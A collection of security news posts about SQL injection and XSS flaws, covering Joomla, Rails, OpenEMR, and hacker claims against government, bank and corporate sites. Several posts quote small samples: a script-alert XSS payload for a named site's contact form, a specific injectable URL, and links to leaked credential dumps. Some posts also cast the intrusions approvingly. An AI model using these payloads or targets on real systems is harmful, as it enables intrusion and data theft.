Joomla 3.2.2 is vulnerable to SQL Injection and XSS


If your website is running Joomla 3.2.2, you should upgrade your CMS to the latest version.

A new version of Joomla v3.2.3 has been released to address more than 40 bugs and four security vulnerabilities.

One of the patched security flaws is SQL Injection, caused by Inadequate escaping, rated as High severity bug.  It affects versions 3.1.0 through 3.2.2.

Other two security bugs are Cross site scripting vulnerabilities, which have been rated as Medium severity bugs. 

The last one allows unauthorized logins via GMail authentication, caused by inadequate checking. It affects versions 2.5.8 and earlier 2.5.x and 3.2.2 and earlier 3.x.

It doesn't matter whether you do care about the 40 bugs but you always should consider the security fixes.  So, better update your cms immediately before attackers informing you by hacking your site.

'Advanced Power' botnet attempts to hack website using victim's machine

S ecurity researcher Brian Krebs has discovered a new Botnet that tests websites for vulnerabilities using the infected machines. 

The malware disguise itself as a legitimate Firefox add on called "Microsoft .NET Framework Assistant" is apparently using the infected machines to find SQL Injection vulnerability in any website visited by the victim.

Once the malware determine the list of vulnerable website, the cyber criminals behind the botnet will be able to exploit the vulnerability to inject malicious codes in the websites.  So, it will probably help the attacker to increase the number of infected websites and systems.

Advanced Power test SQL Injection vulnerability

The malware also capable of stealing sensitive information.  However, the feature is not appeared to be activated on infected systems.

Alex Holden, chief information security officer at Hold Security LLC, analyzed the malware and believes the malware authors are from Czech Republic, based on the text string available in the threat.

Researcher says more than 12,500 systems have been infected by this malware and helped to discover at least 1,800 web pages vulnerable to SQL Injection.

Update:
In an email, a Mozilla spokesperson told EHN that "they have disabled the fraudulent 'Microsoft .NET Framework Assistant' add-on used by 'Advanced Power' as part of its attack. You should always be careful with anything you download. It's a good idea to use many layers of protection, including antivirus software to stop malware."

Vevo website hacked by TeslaTeam via SQL Injection vulnerability

Tesla Team, one of the hacker group from Serbia has claimed to have breached the Vevo website(Vevo.com).

Vevo is a joint venture music video website owned and operated by Universal Music Group, Google, Sony Music Entertainment, and Abu Dhabi Media.

The team has discovered a SQL Injection vulnerability in one of the sub-domains of Vevo website that allowed hackers to compromise their database.

In a pastebin leak(pastebin.com/TAjce91x), the group leaked a vulnerable link as well as a proof of concept that exploits the vulnerability.  The dump of the database is claimed to have containing emails and password of admins and other users.

It appears some one with username "JoinSeventh" in HackForums has already published the vulnerability details in 2012.

OpenEMR affected by Multiple Vulnerabilities

The most popular open source electronic medical records (OpenEMR) is said to have multiple vulnerabilities by the Trustwave SpiderLabs.

It reported that with a guest access, mixed with some application issues the user was able to compromise with the server running OpenEMR and it even served as a dock for attacking the internal networks.

The Researcher found a SQL Injection vulnerability in "Reports > Visits > SuperBill > Dates" location. 

"By browsing to this page and dumping in junk in either the start or end date parameters", he saw the SQL error message saying "ERROR: query failed: select * from forms where form_name = 'New Patient Encounter' and date between 'a'' and '2013-07-12' order by date DESC"

It also claimed to dump most of the database contents and important datas of patients as well as numerous usernames and passwords." I let my GPU box chew on the password hashes for a bit, and kept poking at the application." (the blog says)

OpenEMR is also reported to have HTML injection/XSS on an 'Office Notes' page. The user was even able to beguile the user visiting the page to attempt authentication with his system, which was hosting a fake SMB server with static challenges:

Image Credits: SpiderLabs

"This allowed me to capture a handful of domain usernames and password hashes. In addition, I had some luck cracking the OpenEMR password hashes from earlier, and some of the passwords were re-used locally on the Linux system hosting OpenEMR, allowing me access via SSH."(SpiderLabs reports)

The OpenEMR has been informed of it and they have patched the vulnerabilities in the latest 4.1.1 patch.

Author: Shalini Bhushan


Reckz0r identified POST SQL Injection vulnerability in Twitter

The hacker Reckz0r who recently breached the CNN website has identified a Post based SQL injection vulnerability in Twitter support page.

'Referrer' parameter in the api_general form located at the support.twitter.com is vulnerable to SQLi. 

Although the vulnerability allow hacker to extract confidential data from Twitter, hacker didn't do involve in any malicious activities because he don't want his account to get suspended.

The screenshot provided by the hacker:



" vulnerability lies in http://support.twitter.com/forms/submitted?regarding=api_general - You see, there might be dozens of vulnerabilities lying in support.twitter.com. We can inject hidden boxes in this kind of atmosphere. " hacker said.

Brazil Navy and Pakistan Army websites hacked by SQL Injection


These security breaches are going to be next examples for the Government careless about the cyber security.  The hacker @WilyXem found two more Army websites are vulnerable to SQL Injection.

Brazilian Navy and Pakistan Army websites are found to be affected by the SQL Injection vulnerability.  The hacker tweeted few links that contains the proof-of-concepts(http://sprunge.us/ZUHM, sprunge.us/ZdKY, sprunge.us/CJGO)

The vulnerability exists in the Board of Historic & Documentation Navy(biblioteca.dphdm.mar.mil.br), Department of Distance Education(ead.densm.mar.mil.br) and Pakistan Army(www.pakistanarmy.gov.pk).

The POCs exposes the target database details including database name, database version and table details.

The same hacker yesterday hacked into the Royal Thai Navy website and leaked the login information from the database.


Yahoo! Blind SQL Injection could lead to data leakage


It seems that 2013 is the "Data Leakage Year"!many customers information and confidential data has been published on the internet coming from government institutions, famous vendors, and companies too.

Ebrahim Hegazy(@Zigoo0) an Egyptian information security advisor who found a high severity vulnerability in "Avira license daemon" days ago, is on the news again, but this time for finding and reporting Blind SQL Injection vulnerability in one of Yahoo! E-marketing applications.SQL Injection vulnerabilities is ranked as Critical vulnerabilities, because if used by Hackers it will cause a database breach which will lead to confidential information leakage.

A time based blind SQL Injection web vulnerability is detected in the official Yahoo! TW YSM Marketing Application Service.The vulnerability allows remote attackers to inject own sql commands to breach the database of that vulnerable application and get access to the users data.

The SQL Injection vulnerability is located in the index.php file of the soeasy module when processing to request manipulatedscId parameters. By manipulation of the scId parameter the attackers can inject own sql commands to compromise the webserverapplication dbms.

The vulnerability can be exploited by remote attackers without privileged application user account and without requireduser interaction. Successful exploitation of the sql injection vulnerability results in application and applicationservice dbms compromise.

But Ebrahim is a white hat hacker, so he reported the vulnerability to the Yahoo! security team with recommendations on how to patch the vulnerability.

According to Ebrahim, the time line of the vulnerability was:
================
2013-02-24:    Researcher Notification & Coordination
2013-02-25:    Vendor Notification
2013-03-01:    Vendor Response/Feedback
2013-04-01:    Vendor Fix/Patch by check
================

More details about the vulnerability could be found here:
http://www.resecure.me/public/Yahoo-TW-YSM-BSQLI.txt

As most of readers know that Yahoo! don't have a bug bounty program or Hall of fame too, so as a reward from Yahoo! to the researchers who find a vulnerabilities in Yahoo! applications, they do award researchers by sending them a T-shirts with Yahoo! logo and some other tokens.the researcher told us that he received a package sent to him by Yahoo! which contains 2 T-shirts and a big cup as a reward.

US Telecom companies and Banks breached by Tunisian Cyber Army

As part of their ongoing operation against United States known as "#opBlackSummer", the Tunisian Cyber Army(TCA) and Al-Qaeda Electronic Army(AQEA) has breached the websites belong to US Telecommunication companies.

The hacker group has identified three SQL Injection vulnerabilities in AT&T sub-domains and one SQLi in Verizon website. The hackers provided the vulnerable links to EHN.

The hackers also attacked the the official website for the U.S. Small Business Administration(sba.gov), Merrimack County Savings Bank(mcsbnh.com), State Bank of Park Rapids(statebankofparkrapids.com).

The team exploited the vulnerabilities and compromised information such as User IDs, security question answers, passwords, addresses and email addresses.

XSS in FBI website

Speaking to EHN, the TCA said they exploited the xss vulnerability in FBI website by requesting the admin to open the crafted fbi site link.  The hacker claimed that they got temporary access to their computer and downloaded some files about crimes and report.

At EHN, we can't assure that hackers claims about the data compromise are true but the vulnerability links provided by the hackers are valid one. 

Pakistan goverment site again hacked via SQL Injection vulnerability


Indian hacker Godzilla has once again hacked a very important Pakistani site  www.pakistan.gov.pk .

He took down lots of Pakistani sites just a few days ago. http://www.ehackingnews.com/2013/03/indian-hacker-godzilla-leaked-pakistan.html

Then he told the reason behind the attacks that "Pakistan is a country which is currently supporting terrorist activities through ISI, and if they regret Pakistan army and Ministry of Defense mail server backups are enough to proof how closely the are related to terrorism. Pakistan stop these activities before its too late."

The attack seems to be done via SQL injection.





He finally noted that "No matter how hard you try we will get inside in no time." 

Speaking to EHN the hacker said "Admins and Governments takes website security lightly thinking that they are hosted outside  gets treated through your inside network. Thats enough to get inside your network"

Arabian Gulf Oil Company(Agoco) website hacked by QuisterTow


A hacker with online handle QuisterTow has claimed to have identified a critical SQL Injection vulnerability in Agoco website(agoco.com.ly) - Arabian Gulf Oil Company based in Benghazi, Libya, engaged in crude oil and natural gas exploration, production and refining.

The hacker exploit this vulnerability and managed to dump the database from the server.  He has leaked the login credentials from the database along with the database details.

The leak(pastebin.com/8HLiDqVt ) contains usernames and passwords of admin and few users.  The password used by admin is very weak one and leaked in plain-text format.

The hacker also provided the vulnerable link along with the proof-of-concept to exploit this SQL injection vulnerability that lists the username &password information.

Bollywood Actress Divya Dutta website vulnerable to critical vulnerabilities


Ravi Kariya, a Security Analyst from Cyber Octet Pvt. Ltd (facebook.com/cyberoctet) has discovered critical vulnerabilities in the official website (divyadutta.co.in) of famous Indian Actress Divya Dutta.

There are two SQL Injection vulnerability in the website.  One of the vulnerabilities resides in the  Press Clips page of the site(divyadutta.co.in/pressclipdetail.asp?id=7).  A malicious hacker can exploit this vulnerability and extract the database .

The other one is more critical one , it allows hackers to bypass authentication of the Login .  A malicious hacker can login into the website as admin(divyadutta.co.in/admin/) . This can be done by injecting the crafted password that will modify the sql query such that it allows hacker to login.

There is also Cross site scripting vulnerability in the contact us page(divyadutta.co.in/contact.asp ) .  Injecting the follow code in the fields and clicking the submit button executes the injected code:

"><script>alert('My Love For Divya Dutta')</script>




Ravi tried to contact the Divya dutta via email and Twitter but she fails to respond for his query.  It seems like that She doesn't realize the severity level of this security flaw. A BlackHat hacker is able to deface the site with these vulnerabilities.

I think she will respond after some blackhats attack the site, what do you think guys?

*Update*
After E hacking news published news about the vulnerability, the admin pulled down the divya dutta site. Now the site displays the following error message:

"Directory Listing Denied.This Virtual Directory does not allow contents to be listed."


Sri Lankan NIC site(nic.lk) hacked via SQL injection vulnerability

Recently, we reported that the hackers defaced Top level Domains of Turkmenistan including Google, Gmail, youtube, by exploiting the vulnerability in NIC.tm. Today they have discovered vulnerability in another NIC website.

The hackers found a critical SQL injection vulnerability in Sri Lankan NIC website(nic.lk) that allows hackers to hijack top level Sri Lankan domains .



NIC websites are considered to be most important part of every country on the internet . A network information center (NIC), is the part of the Domain Name System (DNS) of the Internet that keeps the database of domain names, and generates the zone files which convert domain names to IP addresses.

Each NIC is an organization that manages the registration of Domain names within the top-level domains for which it is responsible, controls the policies of domain name allocation, and technically operates its top-level domain.

"any unauthorized access can make a disaster to compromised country ." The hackers said " for example changing all governments website’s DNS to hacker DNS and grab all high-level man of country credentials."

Hackers compromised data from the database and dumped data. They claimed that they reported to nic but there is no response from security team.

Critical Sql Injection vulnerability in Punjab and Sind Bank website

 
An Information Security Expert Narendra Bhati has discovered a critical SQL Injection vulnerability in the Punjab and Sind Bank website(psbindia.com).

Punjab & Sind Bank (P&SB) is a major Public Sector bank in Northern India. Of its more than 1100 branches and offices spread throughout India, almost 450 are in Punjab state, though the bank's corporate headquarters is in New Delhi.

The researcher provided the vulnerable link in an email sent to EHN. As i considered the vulnerability is highly critical one, i am not going to provide the vulnerable link here.


The researcher provided the poc code that allows attackers to extract the username, hashed password, address details stored in the Bank Database.

The researcher also found that the same link is vulnerable to Cross site scripting (XSS) injection. It allows hackers to inject iframe and execute in the site.

Bangladesh Railway , NIMC & Jiban Bima Corporation sites vulnerable to SQL Injection

The Tunisian Hacker, Human Mind Cracker, has claimed to have discovered SQL Injection vulnerability in Top Bangladesh Government websites.

In an email sent to E Hacking News, hacker mentioned that he found SQLi in three Government sites.

Affected Government sites are the official site of Bangladesh Railway(railway.gov.bd) , National Institute of Mass Communication of Bangladesh(NIMC.gov.bd) and Jiban Bima Corporation(JBC.gov.bd).


Hacker managed to breach the database server belong to National Institute of Mass Communication and leaked the stolen data in Hey paste it (heypasteit.com/clip/0NUH)

The database dump contains database table name, name of users, hashed passwords. It contains more than 650+ entries of user data.

The hacker claims that the Bangladesh Gov websites are not secure at all .  As far as i know, not only Bangladesh but also other countries government sites are vulnerable. More than 90% Government websites are vulnerable.

Algerian Bank CPA hacked by Tunisian Hacker


One of the Algerian Banks , Crédit populaire d'Algérie (CPA) Bank is found to be vulnerable to SQL Injection vulnerability.  This critical vulnerability was discovered by a Grey-hat Tunisian Hacker "Human Mind Cracker" who usually targets Bank and Government sites.

In an email sent to EHN, the hacker provided the vulnerable link of the site(cpa-bank.dz).

" I reported to them the vulnerability before I hack into the database,2 days without reply or anything...After that I find that the email that they put it in the website for contact is INVALID mail.So I get into the database." The hacker said.

In a paste(heypasteit.com/clip/0NLX) , hacker dumped the compromised data to prove the severity level of vulnerability.  It contains Username , passwords ,Email addresses, Phone number, Fax and Location.

Bangladesh Post Office site hacked by Human Mind Cracker

A SQL Injection vulnerability has been discovered in official website of Bangladesh Post Office (bangladeshpost.gov.bd). The vulnerability was discovered by the Grey-hat hacker "Human Mind Cracker".

In an email sent to EHN, the hacker provided the vulnerable link and claimed that the site is vulnerable to lot of vulnerabilities.

The hacker breached the site by exploiting the SQL injection vulnerability and compromised the database.

Screenshot of Admin Panel

"I get into their database,and the most funniest thing is that  The passwords is not encrypted with any hash, and this so bad for a website related to a government." the hacker said in the email.

The database dump(heypasteit.com/clip/0N9U) contains database details, username, plain-text format password.  It also includes the admin username and password.

Sony France site vulnerable to SQL Injection Vulnerability

Sony France website(sony.fr) found to be vulnerable to SQL Injection vulnerability that allows hackers to compromise the data. The vulnerability was identified by a hacker from xl3gi0n hackers group.

Sony Corporation commonly referred to as Sony, is a Japanese multinational conglomerate corporation headquartered in Kōnan Minato, Tokyo, Japan. Its diversified business is primarily focused on the electronics, game, entertainment and financial services sectors.


The vulnerability has been discovered in the Sony Computer Science Laboratory (csl.sony.fr). The Vulnerable link provided by the hackers:
www.csl.sony.fr/~pachet/markov_applet_style/get_lyrics.php?auth=10,000 Maniacs&id=1
Hacker claims that he reported about the vulnerability to sony and get rewarded for his finding.

At the time of writing, I am not able to reach the csl.sony.fr.  It appears that the admin has taken the website offline.

CVE-2012-5664 :All Ruby on Rails versions vulnerable to SQL Injection vulnerability


A SQL Injection vulnerability has been discovered in Ruby on Rails that affects  all current versions of the web framework.

According to the advisory, due to the way dynamic finders in Active Record extract options from method parameters, a method parameter can mistakenly be used as a scope.

A Hacker can manipulate it carefully and thereby inject arbitrary SQL code leading to an SQL injection.

Dynamic finders use the method name to determine what field to search, so calls such as: Post.find_by_id(params[:id]) would be vulnerable to an attack.
 
The vulnerability has been fixed in the latest released version 3.2.10, 3.1.9, 3.0.18. All users running an affected release should either upgrade or use one of the work arounds immediately.

The Vulnerability was disclosed on the the Phenoelit blog in late December  where author used the technique to extract user credentials bypassing the authlogic authentication framework.

Tunisian hacker 'Human Mind Cracker' discovered SQLi vulnerability in Tunisian Bank sites

XSS in Bank sites

A Grey Hat Hacker with online handle "Human Mind cracker" has discovered SQL Injection vulnerability in some Tunisian Bank websites. Central Bank of Tunisia(bct.gov.tn) and Bank of Tunisia and the UAE (bte.com.tn) are vulnerable to SQLi .

In an email sent to EHN , hacker provided us the vulnerable link and the Proof-of-Concept(POC). As he recommend us not to publish the vulnerable , we are not providing the link here.

According to hacker, he reported the vulnerability to them but they didn't fix the vulnerability so he hacked into the database.

He has published some database information compromised from the server that includes database name and few username.

Also, he has discovered Cross site scripting (XSS) vulnerability in Central Bank of Tunisia,atb.com.tn and Banque de Tunisie(bt.com.tn).

SQL Injection is one of the most critical vulnerability, as attacker can extract the entire database by exploiting it. Banks should really buff up their security measures ,as cyber criminals mainly target Financial institution. 

Pakistan Hacker Explains How Pakistan google and other sites got hacked

Boolean-based blind SQL injection
Boolean Based SQL Injection vulnerability

Recently, The news about the Pakistani Google hack spread like a wildfire in the Internet.  At the time, Top Level Pakistan Domains displayed the defacement page including Yahoo, MSN, HSBC, EBay,Paypal and more sites.

Today, khanisgr8, a hacker from Pakistan hacker collective called "TeamBlackHats" sent an email regarding the security breach.  He explains how those websites got hacked by Turkish Hacker group "EBoz".

The day before yesterday we mentioned those hacked sites' dns records points to different free hosting site. Also we report that the site might be hacked using PKNIC vulnerability.

PKNIC is responsible for the administration of the .PK domain name space, including the operation of the DNS for the Root-Servers for .PK domains,
and registration and maintenance of all .PK domain names. PKNIC is operated as a self-supporting organization.

The hackers have claimed to have discovered a Boolean-based blind SQL injection, persistent cross site scripting, sensitive directory directory disclosure vulnerabilities in the official website of PKNIC.

They provide us the vulnerable link with POC to exploit it. Also they sent some data compromised using the vulnerability which contains database details, username and hashed password.

Xss vulnerability pknic
Xss vulnerability

He also provide the screenshot of the Cross site scripting vulnerability. When i tried to verify the XSS vulnerability, i just searched in google for the url and visit a PKNIC link.  After visiting the link, i just saw a text "<script>alert("HACKED BY COde InjectOr")</script>". May be Code Injector team attempts to exploit the vulnerability.  

"Apparently Google Pakistan has been defaced by a Turkish Hacker group 'Eboz' . It's still quite hard to believe that Google server has been hacked. They really need to put a lot of focus on their defenses because if one website got hacked that means every other websites can be hacked. " they said.

We have sent an email to PKNIC regarding the vulnerability and waiting for their response. We are not sure whether the vulnerability is fixed or not So we are not providing the vulnerable link here.